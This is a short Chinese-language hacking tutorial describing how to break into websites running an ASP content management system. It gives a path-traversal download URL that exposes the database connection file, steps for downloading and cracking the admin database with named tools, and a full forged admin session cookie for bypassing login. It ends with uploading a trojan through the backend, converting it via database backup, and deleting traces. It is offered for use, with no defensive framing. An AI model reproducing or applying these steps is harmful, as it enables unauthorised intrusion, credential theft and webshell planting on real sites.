过程：
1，搜索关键字，然后把flash/downfile.asp?url=uploadfile/../../conn.asp放在网站的一级域名之后，会出现数据库的路径，
把数据库的路径记下来，之后就是下载数据库了。
2，数据库下好后，用明小子开始扫描。再用在线破戒，得到进入管理中心的管理员密码和帐号.
3，如果破解不出来密码就用桂林老兵进行欺骗，进入后台。(欺骗语句ASPSESSIONIDCARADBTC=PPFHKFMBMFMGDOEIMKKPDFGL; admin%5Fnewasp=AdminStatus=%B8%DF%BC%B6%B9%DC%C0%ED%D4%     B1&AdminID=1&Adminflag=SiteConfig%2CAdvertise%2CChannel%2CTemplate%2CTemplateLoad%2CAnnounce%2CAdminLog%2CSendMessage%     2CCreateIndex%2CAddArticle1%2CAdminArticle1%2CAdminClass1%2CSpecial1%2CCreateArticle1%2CComment1%2CAdminJsFile1%     2CAdminUpload1%2CAdminSelect1%2CAuditing1%2CAddSoft2%2CAdminSoft2%2CAdminClass2%2CSpecial2%2CCreateSoft2%2CComment2%     2CAdminJsFile2%2CAdminUpload2%2CAdminSelect2%2CAuditing2%2CDownServer2%2CErrorSoft2%2CAddShop3%2CAdminShop3%2CAdminClass3%     2CSpecial3%2CCreateShop3%2CComment3%2CAdminJsFile3%2CAdminUpload3%2CAdminSelect3%2CAuditing3%2CAddArticle5%2CAdminArticle5%     2CAdminClass5%2CSpecial5%2CCreateArticle5%2CComment5%2CAdminJsFile5%2CAdminUpload5%2CAdminSelect5%2CAuditing5%     2CDownServer5%     2CAddUser%2CAdminUser%2CChangePassword%2CUserGroup%2CMainList%2COnline%2CVote%2CFriendLink%2CArticleCollect%2CSoftCollect%     2CUploadFile%2CRenameData%2CBackupData%2CRestoreData%2CCompressData%2CSpaceSize%     2CBatchReplace&AdminGrade=999&AdminPass=&RandomCode=3N263U7hgb314iwb&AdminName=)AdminName和AdminPass=的内容需要自己添加
4.进去之后，添加图片或是广告，文章,也就是上传木马。再备份数据库，进入后台。把自己上传的东西删掉。